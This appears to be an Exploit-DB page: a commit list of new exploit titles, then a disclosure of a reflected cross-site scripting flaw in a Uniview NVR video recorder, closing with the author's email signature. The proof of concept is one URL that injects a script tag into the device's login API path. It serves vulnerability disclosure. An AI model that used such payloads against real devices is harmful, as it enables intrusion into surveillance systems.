564d2ddf47
13 changes to exploits/shellcodes/ghdb DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS) Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS) Helmet Store Showroom v1.0 - SQL Injection Human Resource Management System 1.0 - SQL Injection (unauthenticated) Revenue Collection System v1.0 - Remote Code Execution (RCE) WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated) Outline V1.6.0 - Unquoted Service Path Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE) Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)
44 lines
No EOL
908 B
Text
44 lines
No EOL
908 B
Text
# Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)
|
|
# Author: Bleron Rrustemi
|
|
# Discovery Date: 2022-11-15
|
|
# Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/
|
|
# Datasheet:: https://www.uniview.com/download.do?id=1761643
|
|
# Device Firmware: NVR-B3801.20.15.200829
|
|
# Tested Version: NVR301-04S2-P4
|
|
# Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit)
|
|
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)
|
|
# CVE: N/A
|
|
|
|
|
|
|
|
|
|
|
|
# Proof of Concept:
|
|
|
|
IP=IP of the device
|
|
|
|
http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script>
|
|
|
|
|
|
|
|
Best regards,
|
|
|
|
Bleron Rrustemi
|
|
Chief Technology Officer
|
|
Direct: +383 (0) 49 955 503
|
|
E-mail: <mailto:bleron@drugeza.com> bleron@drugeza.com
|
|
|
|
|
|
|
|
<http://>
|
|
|
|
Drugëza SHPK
|
|
Rr. Lekë Dukagjini p.n
|
|
Prishtinë, 10000 • Kosovo
|
|
Tel.: +383 49 955 503
|
|
www.drugeza.com
|
|
|
|
|
|
|
|
|
|
ü Be GREEN, keep it on the SCREEN |